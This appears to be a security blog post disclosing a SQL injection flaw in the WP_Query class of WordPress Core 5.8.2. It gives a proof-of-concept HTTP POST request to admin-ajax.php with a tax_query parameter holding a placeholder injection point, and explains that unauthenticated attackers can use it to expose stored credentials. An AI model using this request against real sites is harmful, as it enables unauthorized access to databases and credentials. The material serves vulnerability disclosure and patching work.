Home Bug & Exploit ‘WP_Query’ SQL Injection on WordPress Core 5.8.2

‘WP_Query’ SQL Injection on WordPress Core 5.8.2

3185
0

WordPress (WP, WordPress.org) is a free and open-source content management system (CMS) written in PHP[4] and paired with a MySQL or MariaDB database. Features include a plugin architecture and a template system, referred to within WordPress as Themes. WordPress was originally created as a blog-publishing system but has evolved to support other web content types including more traditional mailing lists and forums, media galleries, membership sites, learning management systems (LMS) and online stores. One of the most popular content management system solutions in use, WordPress is used by 42.8% of the top 10 million websites as of October 2021.

Refference list :
1. zerodayinitiative
2. exploit-db

POC Details
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Upgrade-Insecure_Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.99
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded

Post Values
action=<action_name>&nonce=a85a0c3bfa&query_vars={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["<injection>"]}}}

This vulnerability allows remote attackers to disclose sensitive information on affected installations of WordPress Core. Authentication is not required to exploit this vulnerability. The specific flaw exists within the WP_Query class. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise.

TOP 3 Website to track WordPress hacking alert

WordPress is an open source application that is very popularly used as a blog engine. WordPress is built with the Read more

Unauthenticated Admin Account Creation in WordPress MasterStudy LMS 2.7.5

WordPress (WP, WordPress.org) is a free and open-source content management system (CMS) written in PHP[4] and paired with a MySQL Read more

Previous articleEmail Login checker API in php
Next articleSmart Product Review 1.0.4 Arbitrary File Upload on WordPress

LEAVE A REPLY

Please enter your comment!
Please enter your name here